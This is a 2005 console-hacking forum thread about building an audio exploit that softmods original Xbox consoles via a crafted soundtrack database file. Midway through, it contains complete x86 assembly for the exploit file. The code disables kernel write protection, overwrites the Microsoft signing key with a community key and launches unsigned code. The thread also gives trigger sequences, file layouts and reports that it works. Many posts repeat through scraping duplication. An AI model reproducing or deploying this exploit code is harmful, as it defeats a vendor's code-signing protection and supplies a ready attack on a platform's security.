Post by: Ndure protagonist on September 23, 2005, 09:07:00 AM
On 5713 & 5838 kernels, that's currently only possible using SCEEE and MAEEE, which is far from ideal. Additionally, UDDAE wouldn't suffer from reset-on-eject...
It requires a suitably exploited ST.DB file plus the xboxdash.xbe and six XIP* files from the UberDash (or SlaYers 2.5's 4920, the XBE via a patch**).
The ST.DB's the challenge... since UDDAE's triggered first by easter-egging the xboxdash.xbe (as settings_adoc.xip in the 5960 dash) then triggering the audio exploit (via the Uber4920 dash) the memory layout isn't what the existing ST.DB was coded for,I presume, as the Xbox reboots.
Anyone interested in attempting to get it working (maybe by re-coding rmenhal's hulkstdb.asm***) and/or have any questions/comments?
* default, keyboard, mainmenu5, music_copy3, music_playedit2 and music2 (place in xboxdashdata.17cdc100).
** http://forums.xbox-scene.com/index.php?act...dpost&p=2351379 (place in xboxdashdata.185ead00).
*** http://forums.xbox-scene.com/index.php?act...dpost&p=1849661 (HULK audio exploit; suitable baseline?)
Edit: This pertains to the Ndure fonts setup too...
This post has been edited by Ndure protagonist: Sep 23 2005, 04:15 PM
Post by: Textbook on September 23, 2005, 09:14:00 AM
Post by: Ndure protagonist on September 23, 2005, 09:56:00 AM
Re. the xboxdash.xbe being placed in xboxdashdata.185ead00: it needs to be named as settings_adoc.xip in there.
Re. the .xip's being placed in xboxdashdata.17cdc100: there will consequently be two xboxdashdata.{version#} directories; my tests found this one isn't affected by dashupdate.xbe runs.
{: Textbook, in not so many words (tee-hee) it was previously introduced re. "UD-eh!" :}
Post by: kingroach on September 23, 2005, 10:11:00 AM
Post by: krayzie on September 23, 2005, 10:20:00 AM
QUOTE
This works best when you already have a soundtrack copied to your HD using the msdash.
Select music, the soundtrack you copied over, copy, copy, new soundtrack, and put in the following as name. This must be
exactly like this: <<Eggsßox>> ,Done (the <<>> are under symbols and the ß is under accents. Also note the capital E)
Select music, the soundtrack you copied over, copy, copy, new soundtrack, and put in the following as name. This must be
exactly like this: <<Eggsßox>> ,Done (the <<>> are under symbols and the ß is under accents. Also note the capital E)
Post by: xman954 on September 24, 2005, 12:27:00 PM
QUOTE
since UDDAE's triggered first by easter-egging the xboxdash.xbe
(as settings_adoc.xip in the 5960 dash)
(as settings_adoc.xip in the 5960 dash)
this xboxdash.xbe is from the uber4920 dash (17cdc100) ???
QUOTE
then triggering the audio exploit (via the Uber4920 dash)
how is it triggered ?
how many dirrerent types of exploited ST.DB are there ?
so what will happen:
5960 dash > st.db > (<<Eggsßox>>) > uber4920 > trigger? > st.db > habibi signed code
the 5960 dash must also see this st.db as valid ?
at what point does it reboot ?
Post by: Ndure protagonist on September 24, 2005, 06:45:00 PM
QUOTE
this xboxdash.xbe is from the uber4920 dash (17cdc100) ???
Yes (which can also be made from 1012a700's with the patch)QUOTE
how is it triggered ?
how many dirrerent types of exploited ST.DB are there ?
The audio exploit is triggered by pressing the button sequence below.how many dirrerent types of exploited ST.DB are there ?
I know of only two "types" of exploited ST.DB; the 4920 dash (I've tried catfish's) and the HULK movie disc (rmenhal's).
QUOTE
so what will happen:
5960 dash > st.db > (<<Eggsßox>>) > uber4920 > trigger? > st.db > habibi signed code
Yes (the st.db being in E:\TDATA\fffe0000\music and "trigger?" as below)5960 dash > st.db > (<<Eggsßox>>) > uber4920 > trigger? > st.db > habibi signed code
QUOTE
the 5960 dash must also see this st.db as valid ?
at what point does it reboot ?
It will (the 5960 dash's easter-egg doesn't validate the st.db).at what point does it reboot ?
With the st.db's I've tried, the reboot occurs as soon as you press the last button:
CODE
A (MUSIC)
Down
A (blank)
Down
A (COPY)
Right
Right
A (COPY)
A (NEW SOUNDTRACK)
A (DONE)
Down
A (blank)
Down
A (COPY)
Right
Right
A (COPY)
A (NEW SOUNDTRACK)
A (DONE)
Post by: xman954 on September 25, 2005, 01:29:00 PM
from looking at it, that is what happens....
if codes is running the thing that is not known is where the Kernal table is ?
if so do you think it is possible to search for the "XePublicKeyData" the MS Key
using: [address] that has 31415352h for data, and [address+10h] must have 10001h for data...(maybe 1st, 2nd, 3rd or last instants of it)
start search at 80000000h ? (the lowest address it could be)
then calculate all the other Kernal table entrees on the fly from there ?
Post by: Ndure protagonist on September 25, 2005, 07:44:00 PM
I don't even know whether a 4920 dash audio exploit source might be a better baseline (than HULK's)?
It sure would be great if a generic ST.DB (which I think you're suggesting) is a possibility for Ndure though.
Post by: dus on September 26, 2005, 01:09:00 AM
QUOTE(xman954 @ Sep 25 2005, 09:40 PM)
what makes the code start running from address 0 in the "hulk" st.db
from looking at it, that is what happens....
from looking at it, that is what happens....
It doesn't start at 0. The three dd:s (HEAD012) are actually very important...
I don't know much, but I believe they are used to corrupt the stack when st.db is read.
Good luck!
Post by: PedrosPad on September 26, 2005, 08:37:00 AM
QUOTE(Ndure protagonist @ Sep 25 2005, 02:56 AM)
It will (the 5960 dash's easter-egg doesn't validate the st.db).
A quote from rmenhal:
QUOTE(rmenhal @ May 24 2004, 04:51 AM)
You forgot that audio exploits don't work with post-4920 dashes
:(
This post has been edited by PedrosPad: Sep 26 2005, 04:01 PM
Post by: Ndure protagonist on September 26, 2005, 09:01:00 AM
(Hopefully this clarifies your post-edit too.)
This post has been edited by Ndure protagonist: Sep 26 2005, 04:03 PM
Post by: PedrosPad on September 26, 2005, 09:06:00 AM
QUOTE(Ndure protagonist @ Sep 26 2005, 05:12 PM)
PedrosPad, your pre-edit info. was correct, which is why UDDAE needs 5960's easter-egg capability to launch the Uber4920's skeleton, which is then audio exploited...
(Hopefully this clarifies your post-edit too.)
(Hopefully this clarifies your post-edit too.)
5960 dash > (<<Eggsßox>>) > Uber4920 > trigger > audio exploit(st.db) > habibi signed code.
(correction to post #7! - :P )
This post has been edited by PedrosPad: Sep 26 2005, 04:18 PM
Post by: Ndure protagonist on September 26, 2005, 09:07:00 AM
Post by: DaBiscuit on September 26, 2005, 09:19:00 AM
QUOTE(Ndure protagonist @ Sep 23 2005, 04:18 PM)
Ndure's fonts and retail Uber Double Dash setups seem to provide a unique Audio Exploit opportunity, that could enable a 'purely MS dash' way back to the softmod from the "full retail" (Live console compliant) dashboard!
Would you mind clarifying for me what exactly you wish to achieve? I don't entirely understand. NDURE allows a user to boot either a shadow C with retail MS dash, or a modded dash with a homebrew dash. Both work well, so what is it that this new exploit would add?
I'm not trying to be rude, I would like to understand.
This post has been edited by DaBiscuit: Sep 26 2005, 04:19 PM
Post by: Horscht on September 26, 2005, 09:28:00 AM
Post by: Ndure protagonist on September 26, 2005, 09:58:00 AM
However, it's worth pursuing for that benefit alone because it's technically and legally(!) a better alternative than SCEEE and MAEEE...
Post by: DaBiscuit on September 26, 2005, 10:06:00 AM
QUOTE(Ndure protagonist @ Sep 26 2005, 05:09 PM)
Actually it's only "necessarily" beneficial for returning from the Live console enabled MS dash (as the softmod can be used to change the network settings and deactivate Ndure) without using an exploitable game.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 26, 2005, 10:20:00 AM
-
DaBiscuit, sounds like you're referring to the limitations audio expolits have had for the past couple of years.
If that's so, then this is unrelated (as the booted dashboard here is the 5960).
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on September 26, 2005, 11:14:00 AM
-
Post by: Ndure protagonist on September 26, 2005, 10:20:00 AM
If that's so, then this is unrelated (as the booted dashboard here is the 5960).
Post by: Cio on September 26, 2005, 11:14:00 AM
QUOTE(DaBiscuit @ Sep 26 2005, 05:30 PM)
...NDURE allows a user to boot either a shadow C with retail MS dash, or a modded dash with a homebrew dash...
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on September 26, 2005, 11:39:00 AM
-
thats only if the fix the <<eggsBox>> thing (validate setting_adoc.xip) but with xbox360 on it way will they still do updates
we know where it is (in mem) when it is booted it's normal way (hulk xboxdash.xbe)
but now it is loaded from dash 5960 using the <<eggsBox>> thing
so we just need to find what the address is where 5960 loads setting_adoc.xip
then just add that offset from 80000000h to the hulk st.db ??????
maybe using a hacked MS bios that only patches the MS key then run a "habibi signed test" setting_adoc.xip to get it's starting addr (writes it to a file) ???
of course it would be easier to have a X86 emulator with a J-tag interface
or some fancy monitor code to do "trace" and set break points
(can the XDK do this)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: DaBiscuit on September 26, 2005, 11:45:00 AM
-
Post by: xman954 on September 26, 2005, 11:39:00 AM
QUOTE(DaBiscuit @ Sep 26 2005, 12:17 PM)
that if a new dash comes out, they can be utterly useless, unless you avoid updates.
thats only if the fix the <<eggsBox>> thing (validate setting_adoc.xip) but with xbox360 on it way will they still do updates
QUOTE
It doesn't start at 0. The three dd:s (HEAD012) are actually very important...
i see that now it starts a 0Chwe know where it is (in mem) when it is booted it's normal way (hulk xboxdash.xbe)
but now it is loaded from dash 5960 using the <<eggsBox>> thing
so we just need to find what the address is where 5960 loads setting_adoc.xip
then just add that offset from 80000000h to the hulk st.db ??????
maybe using a hacked MS bios that only patches the MS key then run a "habibi signed test" setting_adoc.xip to get it's starting addr (writes it to a file) ???
of course it would be easier to have a X86 emulator with a J-tag interface
or some fancy monitor code to do "trace" and set break points
(can the XDK do this)
Post by: DaBiscuit on September 26, 2005, 11:45:00 AM
QUOTE(Ndure protagonist @ Sep 26 2005, 05:31 PM)
DaBiscuit, sounds like you're referring to the limitations audio expolits have had for the past couple of years.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on September 27, 2005, 12:57:00 AM
-
ndure exploit depends on the xodash.xbe (XBL dash, whats booted via live tab) fo th exploit. this way, you have a font exploitabel XBE that doesn't look for fonts in the fonts folder or root. thus, you can boot the M$dash without a virtual C (can have retail fonts in place) BUT the live tab wont work... cause its font exploited. so to use the live dash, you need to remove the ndure exploit. just have a look at your real C.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 27, 2005, 02:47:00 AM
-
Post by: Cio on September 27, 2005, 12:57:00 AM
Post by: PedrosPad on September 27, 2005, 02:47:00 AM
QUOTE(Ndure protagonist @ Sep 26 2005, 06:09 PM)
Actually it's only "necessarily" beneficial for returning from the Live console enabled MS dash (as the softmod can be used to change the network settings and deactivate Ndure) without using an exploitable game.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on September 27, 2005, 08:55:00 AM
-
The quote in the post above you contains the awser...
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 27, 2005, 09:06:00 AM
-
PedrosPad, I hope I'm not seeming to be "ripping off" your (or anyones) ideas or previous work, that's certainly not my nature. I have attempted to transfer knowledge and (much more challengingly) increase the level of understanding of how things work, such as via the green link in my sig!
I think I've added value regarding the "deployment aspect" of softmodding too (as 'eh.'). In addition to what you described (re. Ndure) as realising what the sum of the parts equaled, I also take pride in recognising that 17cdc100's xboxdashdata directory could co-exist with 185ead00's (and therefore be utilised for the audio exploit via the easter-egg).
I published that latter info. here in February and noone picked up on it. Now seemed the right time to, since folks with uber-skills were active (like xman954, dr_oldschool and dus) and their recent work may have rekindled the enthusiasm in some others, to help us get a little closer to your vision...
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 27, 2005, 09:19:00 AM
-
Post by: Cio on September 27, 2005, 08:55:00 AM
Post by: Ndure protagonist on September 27, 2005, 09:06:00 AM
I think I've added value regarding the "deployment aspect" of softmodding too (as 'eh.'). In addition to what you described (re. Ndure) as realising what the sum of the parts equaled, I also take pride in recognising that 17cdc100's xboxdashdata directory could co-exist with 185ead00's (and therefore be utilised for the audio exploit via the easter-egg).
I published that latter info. here in February and noone picked up on it. Now seemed the right time to, since folks with uber-skills were active (like xman954, dr_oldschool and dus) and their recent work may have rekindled the enthusiasm in some others, to help us get a little closer to your vision...
Post by: PedrosPad on September 27, 2005, 09:19:00 AM
QUOTE(Ndure protagonist @ Sep 27 2005, 05:17 PM)
PedrosPad, I hope I'm not seeming to be "ripping off" your (or anyones) ideas or previous work,
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 28, 2005, 12:36:00 AM
-
Post by: Ndure protagonist on September 28, 2005, 12:36:00 AM
QUOTE(xman954 @ Sep 26 2005, 12:50 PM)
i see that now it starts a 0Ch
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 28, 2005, 04:33:00 AM
-
).
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on September 28, 2005, 08:27:00 AM
-
Post by: PedrosPad on September 28, 2005, 04:33:00 AM
).
Post by: PedrosPad on September 28, 2005, 08:27:00 AM
QUOTE(xman954 @ Sep 26 2005, 07:50 PM)
we know where it is (in mem) when it is booted it's normal way (hulk xboxdash.xbe)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on September 29, 2005, 09:10:00 AM
-
PedrosPad, do you mean porting the HULK audio exploit's code to run with it (17cdc100) under normal boot conditions first?
{: I confirmed on my 3944 a long time ago that, as expected, a 4920 audio exploit works with it that way. :}
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 02, 2005, 05:39:00 PM
-
some good news
i have a working ST.DB for cold boot > uber4020 dash > st.db > habibi
(using a NDURE C:\ along side it)
that is based on the "doublestdb" by rmenhal
the one that uses "BUFF" instead of "RIFF" as HEAD0 (the one that cleans up the music dir)
so now we just need to find the offset of 5960 dash from <<EggsBox>>
i will try to do a xbe (settings_adoc.xip) that just writes this offset to a file
here it is incase some wants to work on this.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on October 02, 2005, 09:57:00 PM
-
Well done yet again xman954!
I've confirmed it works on my 3944; hopefully someone can test it on 5713/5838...
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on October 04, 2005, 03:26:00 AM
-
Post by: Ndure protagonist on September 29, 2005, 09:10:00 AM
{: I confirmed on my 3944 a long time ago that, as expected, a 4920 audio exploit works with it that way. :}
Post by: xman954 on October 02, 2005, 05:39:00 PM
i have a working ST.DB for cold boot > uber4020 dash > st.db > habibi
(using a NDURE C:\ along side it)
that is based on the "doublestdb" by rmenhal
the one that uses "BUFF" instead of "RIFF" as HEAD0 (the one that cleans up the music dir)
so now we just need to find the offset of 5960 dash from <<EggsBox>>
i will try to do a xbe (settings_adoc.xip) that just writes this offset to a file
here it is incase some wants to work on this.
CODE
;;;
;;; Compile: nasm -o ST.DB stdb.asm
;;;
BITS 32
stdbmemofs equ 1498BCh ; < fixed by 4920 dash
D5960_offset equ 00000000h ; what is it ? <<<<<<
mem_offset equ 0D004B694h + D5960_offset ; adrress when launched from 4920 only
bin_start:
.HEAD0 dd 'BUFF'
.HEAD1 dd (mem_offset-1498C8h)/4
.HEAD2 dd .start-.HEAD0+stdbmemofs
;;;
;;; Summary:
;;; 1) Remove the subdirectory 1498c8 (HEAD2) that Dashboard created.
;;; 2) Rewrite ST.DB to disk (because Dashboard gobbles it.)
;;; 3) Change the MS public key in kernel to habibi-key.
;;; 4) Load and run a habibi-signed XBE.
;;;
.start:
call .base
.base: pop ebp
jmp short .continuecode
;----------------
.xbestring db 'default.xbe',0
.trnumstr db 'T:\music\1498c8',0
.trnum dw $-.trnumstr-1, $-.trnumstr-1
.ptrnumstr dd .trnumstr-.HEAD0+stdbmemofs
.tmusicstdb dw 14, 14
dd 17E10h; "T:\MUSIC\ST.DB"
.dispose db 1
;----------------
.continuecode:
; jmp short $ ; make it hang <<<<<<<<<<<<<<<<
dec dword [ebp+.HEAD1-.base]
dec dword [ebp+.HEAD2-.base]
push dword [ebp+.HEAD0-.base-4]
call dword [12034h]; NtClose
push byte 26
pop ecx
xor eax,eax
mov edi,stdbmemofs+416
rep stosd
inc eax
stosd
mov dword [edi-12],21371h
push eax
mov ebx,esp ; File handle
push eax
push eax
mov esi,esp ; IO status
lea eax,[ebp+.trnum-.base]
push byte 40h
push eax
push byte -3
mov edi,esp ; Object attributes
push byte 1
push byte 4
push esi
push edi
push dword 10000h
push ebx
call dword [12040h]; NtOpenFile
push byte 13 ; 13 = FileDispositionInformation
push byte 1
lea eax,[ebp+.dispose-.base]
push eax
push esi
push dword [ebx]
call dword [120A0h]; NtSetInformationFile
push dword [ebx]
call dword [12034h]; NtClose
lea eax,[ebp+.tmusicstdb-.base]
mov [edi+4],eax
push byte 22h
push byte 3
push esi
push edi
push dword 40100000h
push ebx
call dword [12040h]; NtOpenFile
mov eax,512+12
lea edx,[ebp+.HEAD0-.base]
call .write
push byte 101
pop ecx
mov eax,512-12
.wl: push ecx
mov edx,10D70h; zeroes at 0x10D70
call .write
mov eax,512
pop ecx
loop .wl
push dword [ebx]
mov esi,dword [12034h]; NtClose
call esi
; add esp,byte 12+8+4
.patchpublickey:
mov ebx,dword [121A8h]; XePublicKeyData
test ebx,ebx
jz short .badexport
cmp dword [ebx],31415352h
jne short .badexport
cmp dword [ebx+10h],10001h
je short .keyfound
.badexport:
and si,0F000h
.findkernel:
mov ax,[esi]
cmp ax,'ZM'
je short .check
cmp ax,'MZ'
je short .check
.retry: sub esi,1000h
jmp short .findkernel
.check:
mov eax,[esi+3Ch]
cmp eax,0FFFh
ja short .retry
cmp dword [esi+eax],'PE'
jne short .retry
mov ebx,esi
.searchkey:
inc ebx
cmp dword [ebx],31415352h
jne short .searchkey
cmp dword [ebx+10h],10001h
jne short .searchkey
.keyfound:
.searchkeyend:
inc ebx
cmp dword [ebx],0A44B1BBDh
jne short .searchkeyend
cli
mov ecx,cr0
push ecx
and ecx,0FFFEFFFFh
mov cr0,ecx
xor dword [ebx],2DD78BD6h
pop ecx
mov cr0,ecx
sti
.loadrunxbe:
push byte 0
push esp
push byte 0
push byte 2
push 127C8h ; "\Device\Harddisk0\partition1"
lea eax,[ebp+.xbestring-.base]
push eax
mov esi,555A9h
call esi
.inf: jmp short .inf
;------------------------
.write:
xor ecx,ecx
push ecx
push eax
push edx
push esi
push ecx
push ecx
push ecx
push dword [ebx]
call dword [120D8h]; NtWriteFile
ret
;
%if $-.HEAD0 > 416
%error 416 bytes maximum!
%endif
times 512-$+.HEAD0 db 0
dd 21371h, 0, 1 ; An empty no-name track (for HD to HD copy)
times 52224-$+bin_start.HEAD0 db 0
;;; Compile: nasm -o ST.DB stdb.asm
;;;
BITS 32
stdbmemofs equ 1498BCh ; < fixed by 4920 dash
D5960_offset equ 00000000h ; what is it ? <<<<<<
mem_offset equ 0D004B694h + D5960_offset ; adrress when launched from 4920 only
bin_start:
.HEAD0 dd 'BUFF'
.HEAD1 dd (mem_offset-1498C8h)/4
.HEAD2 dd .start-.HEAD0+stdbmemofs
;;;
;;; Summary:
;;; 1) Remove the subdirectory 1498c8 (HEAD2) that Dashboard created.
;;; 2) Rewrite ST.DB to disk (because Dashboard gobbles it.)
;;; 3) Change the MS public key in kernel to habibi-key.
;;; 4) Load and run a habibi-signed XBE.
;;;
.start:
call .base
.base: pop ebp
jmp short .continuecode
;----------------
.xbestring db 'default.xbe',0
.trnumstr db 'T:\music\1498c8',0
.trnum dw $-.trnumstr-1, $-.trnumstr-1
.ptrnumstr dd .trnumstr-.HEAD0+stdbmemofs
.tmusicstdb dw 14, 14
dd 17E10h; "T:\MUSIC\ST.DB"
.dispose db 1
;----------------
.continuecode:
; jmp short $ ; make it hang <<<<<<<<<<<<<<<<
dec dword [ebp+.HEAD1-.base]
dec dword [ebp+.HEAD2-.base]
push dword [ebp+.HEAD0-.base-4]
call dword [12034h]; NtClose
push byte 26
pop ecx
xor eax,eax
mov edi,stdbmemofs+416
rep stosd
inc eax
stosd
mov dword [edi-12],21371h
push eax
mov ebx,esp ; File handle
push eax
push eax
mov esi,esp ; IO status
lea eax,[ebp+.trnum-.base]
push byte 40h
push eax
push byte -3
mov edi,esp ; Object attributes
push byte 1
push byte 4
push esi
push edi
push dword 10000h
push ebx
call dword [12040h]; NtOpenFile
push byte 13 ; 13 = FileDispositionInformation
push byte 1
lea eax,[ebp+.dispose-.base]
push eax
push esi
push dword [ebx]
call dword [120A0h]; NtSetInformationFile
push dword [ebx]
call dword [12034h]; NtClose
lea eax,[ebp+.tmusicstdb-.base]
mov [edi+4],eax
push byte 22h
push byte 3
push esi
push edi
push dword 40100000h
push ebx
call dword [12040h]; NtOpenFile
mov eax,512+12
lea edx,[ebp+.HEAD0-.base]
call .write
push byte 101
pop ecx
mov eax,512-12
.wl: push ecx
mov edx,10D70h; zeroes at 0x10D70
call .write
mov eax,512
pop ecx
loop .wl
push dword [ebx]
mov esi,dword [12034h]; NtClose
call esi
; add esp,byte 12+8+4
.patchpublickey:
mov ebx,dword [121A8h]; XePublicKeyData
test ebx,ebx
jz short .badexport
cmp dword [ebx],31415352h
jne short .badexport
cmp dword [ebx+10h],10001h
je short .keyfound
.badexport:
and si,0F000h
.findkernel:
mov ax,[esi]
cmp ax,'ZM'
je short .check
cmp ax,'MZ'
je short .check
.retry: sub esi,1000h
jmp short .findkernel
.check:
mov eax,[esi+3Ch]
cmp eax,0FFFh
ja short .retry
cmp dword [esi+eax],'PE'
jne short .retry
mov ebx,esi
.searchkey:
inc ebx
cmp dword [ebx],31415352h
jne short .searchkey
cmp dword [ebx+10h],10001h
jne short .searchkey
.keyfound:
.searchkeyend:
inc ebx
cmp dword [ebx],0A44B1BBDh
jne short .searchkeyend
cli
mov ecx,cr0
push ecx
and ecx,0FFFEFFFFh
mov cr0,ecx
xor dword [ebx],2DD78BD6h
pop ecx
mov cr0,ecx
sti
.loadrunxbe:
push byte 0
push esp
push byte 0
push byte 2
push 127C8h ; "\Device\Harddisk0\partition1"
lea eax,[ebp+.xbestring-.base]
push eax
mov esi,555A9h
call esi
.inf: jmp short .inf
;------------------------
.write:
xor ecx,ecx
push ecx
push eax
push edx
push esi
push ecx
push ecx
push ecx
push dword [ebx]
call dword [120D8h]; NtWriteFile
ret
;
%if $-.HEAD0 > 416
%error 416 bytes maximum!
%endif
times 512-$+.HEAD0 db 0
dd 21371h, 0, 1 ; An empty no-name track (for HD to HD copy)
times 52224-$+bin_start.HEAD0 db 0
Post by: Ndure protagonist on October 02, 2005, 09:57:00 PM
I've confirmed it works on my 3944; hopefully someone can test it on 5713/5838...
Post by: PedrosPad on October 04, 2005, 03:26:00 AM
QUOTE(xman954 @ Oct 3 2005, 01:50 AM)
some good news
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 04, 2005, 07:25:00 PM
-
Alright, I've been out of the scene for a while but was going to try this on my ntsc 5838 box. I'm still pretty confused but this is what i've been able to put together (can't someone just put everything in one posts instead of making jump post to post, lol)
using kingroaches ndure 2.1 i should have:
C\
Audio/
bios/
Fonts/
media/
shadowc/
xboxdashdata.17cdc100/ (with only? Default.xip, keyboard.xip, mainmenu5.xip, music_copy3.xip, music_playedit2.xip and music2.xip)
xboxdashdata.185ead00/ (with 4817 xboxdash.xbe renamed settings_adoc.xip)
xodash/ (with s1974272->s1994752 patched update.xbe)
msxboxdash.xbe
xboxdash.xbe
default.xip (from dash 4817)
mainmenu5.xip (from dash 4817)
bert.xtf and ernie.xtf (from here http://forums.xbox-s...post&p=1387970)
and
E\
Dash\
TDATA/fffe0000/music/ (with xman954s st.db)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on October 04, 2005, 08:36:00 PM
-
{: dumdasme, that's similar to the setup I have on mine! :}
If you haven't yet, delete the 21 MB filler from shadowc (Ndure 2.1 preallocates that for easter-egging).
The 4817 stuff (incl. the bert and ernie in /C) wont work on a 5838, so delete those too.
The update.xbe in xodash should be the original one (the 185EAD00 version).
.
.
.
This test needs the Uber4920 xboxdash.xbe in C (the MS signed 17CDC100 version).
Also, copy /C/bios/bios.xbe to /E/default.xbe (as that's the habibi signed file this test's st.db launches).
If I haven't missed anything your Xbox should boot, look like "normal" (but only the Music tab will work) and the 10 button presses ("code" segment earlier in this thread) will hopefully trigger the audio exploit on your 5838...
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 04, 2005, 10:44:00 PM
-
need some help here
could someone test this out also...
what i did find is, if you run a probe xbe that has a kernal thunk
table in it, all the "normal X86" reg are the same value no matter how it
booted, DVD or eggsbox or evox, i must be missing something.
is it something to do with the CPU "protected mode" ?
i can add code to the probe to find what we need, but i just dont know what to do
then write it to a file (that part works good)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on October 05, 2005, 01:57:00 AM
-
Post by: dumdasme on October 04, 2005, 07:25:00 PM
using kingroaches ndure 2.1 i should have:
C\
Audio/
bios/
Fonts/
media/
shadowc/
xboxdashdata.17cdc100/ (with only? Default.xip, keyboard.xip, mainmenu5.xip, music_copy3.xip, music_playedit2.xip and music2.xip)
xboxdashdata.185ead00/ (with 4817 xboxdash.xbe renamed settings_adoc.xip)
xodash/ (with s1974272->s1994752 patched update.xbe)
msxboxdash.xbe
xboxdash.xbe
default.xip (from dash 4817)
mainmenu5.xip (from dash 4817)
bert.xtf and ernie.xtf (from here http://forums.xbox-s...post&p=1387970)
and
E\
Dash\
TDATA/fffe0000/music/ (with xman954s st.db)
Post by: Ndure protagonist on October 04, 2005, 08:36:00 PM
If you haven't yet, delete the 21 MB filler from shadowc (Ndure 2.1 preallocates that for easter-egging).
The 4817 stuff (incl. the bert and ernie in /C) wont work on a 5838, so delete those too.
The update.xbe in xodash should be the original one (the 185EAD00 version).
.
.
.
This test needs the Uber4920 xboxdash.xbe in C (the MS signed 17CDC100 version).
Also, copy /C/bios/bios.xbe to /E/default.xbe (as that's the habibi signed file this test's st.db launches).
If I haven't missed anything your Xbox should boot, look like "normal" (but only the Music tab will work) and the 10 button presses ("code" segment earlier in this thread) will hopefully trigger the audio exploit on your 5838...
Post by: xman954 on October 04, 2005, 10:44:00 PM
QUOTE
Cold boot->D:5960->"<<EggsBox>>"->ProbeEnabledUberDash
= REBOOT and no file write...(modchip ON, OFF = "not a xbox disk")could someone test this out also...
what i did find is, if you run a probe xbe that has a kernal thunk
table in it, all the "normal X86" reg are the same value no matter how it
booted, DVD or eggsbox or evox, i must be missing something.
is it something to do with the CPU "protected mode" ?
i can add code to the probe to find what we need, but i just dont know what to do
then write it to a file (that part works good)
Post by: PedrosPad on October 05, 2005, 01:57:00 AM
QUOTE(xman954 @ Oct 5 2005, 06:55 AM)
need some help here
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 05, 2005, 08:29:00 PM
-
Worked perfect on my ntsc 5838 using the generic fonts.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 05, 2005, 09:41:00 PM
-
Sorry for the double post, but it wouldn't let me edit. I also tested this on an ntsc 4920 with generic fonts and it works. If anyone is interested in my final file setup look here
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on October 05, 2005, 11:37:00 PM
-
@dundasme
AFAIK, this bit is wrong:
msxboxdash.xbe (uber4920 [.17cdc100] one) needs to be the 185ead00 xboxdash.xbe
and
xboxdashdata.185ead00/
should note: 17cdc100 xboxdash.xbe as settings_adoc.xip
And i was wondering how i should save this PPF since i keep getting "this is not a valid ppf file" errors..
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on October 06, 2005, 06:49:00 AM
-
Post by: dumdasme on October 05, 2005, 08:29:00 PM
Post by: dumdasme on October 05, 2005, 09:41:00 PM
Post by: Cio on October 05, 2005, 11:37:00 PM
AFAIK, this bit is wrong:
msxboxdash.xbe (uber4920 [.17cdc100] one) needs to be the 185ead00 xboxdash.xbe
and
xboxdashdata.185ead00/
should note: 17cdc100 xboxdash.xbe as settings_adoc.xip
And i was wondering how i should save this PPF since i keep getting "this is not a valid ppf file" errors..
Post by: kingroach on October 06, 2005, 06:49:00 AM
QUOTE(Cio @ Oct 6 2005, 07:48 AM)
@dundasme
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 06, 2005, 11:55:00 AM
-
also with bert.xtf and ernie.xtf in the root of C:\ (even though there not used by NDURE)
i think the problem is:
the way it was intended to be booted was from the XBL tab of a newer
dash (not 5960) then you would do the audio hack using the doubleST.DB
that would, on it's first pass
but the (double)st.db still works coldboot>ProbeEnabledUberDash just no file write
as of yet, no file write...
can someone try to get it to write a file (any setup) ?
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 06, 2005, 04:17:00 PM
-
oops, I meant my ntsc 3944.
@cio- On the 5838 i can't use the settings_adoc.xip xbe because that has been fixed in this kernel. So instead, on both xboxes, i used the st.db to trigger the default.xbe in E\.
I'm not sure if how i have it setup i can access my live console or not, i don't use live so i can't really test it. Since I have the dualboot setup, can i access the live console or do i need to boot straight into the uber4920 dash's xboxdash.xbe?
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on October 06, 2005, 10:28:00 PM
-
Post by: xman954 on October 06, 2005, 11:55:00 AM
QUOTE(PedrosPad @ Oct 5 2005, 04:08 AM)
Obviously try
Cold boot->D:5960->"<<EggsBox>>"->UberDash
works first! - in order to verify that all the UberDash support files are in place.
that was the first thing i did and that works fineCold boot->D:5960->"<<EggsBox>>"->UberDash
works first! - in order to verify that all the UberDash support files are in place.
QUOTE
After injecting probe.bin into the UberDash, re-sign the ProbeEnabledUberDash with xbedump - as this recalcs the XBE section checksums! If you haven't already, it would be a good idea to rename the 'output file' from "bert.xtf", as we don't actually want this mistakenly read as a font at this point. 
did that too, data.dat... also with bert.xtf and ernie.xtf in the root of C:\ (even though there not used by NDURE)
i think the problem is:
the way it was intended to be booted was from the XBL tab of a newer
dash (not 5960) then you would do the audio hack using the doubleST.DB
that would, on it's first pass
CODE
;;; 1) Remove the subdirectory 1498c8 (HEAD2) that Dashboard created.
;;; 2) Read a replacement hack from the end of ST.DB and write it to the
;;; beginning.
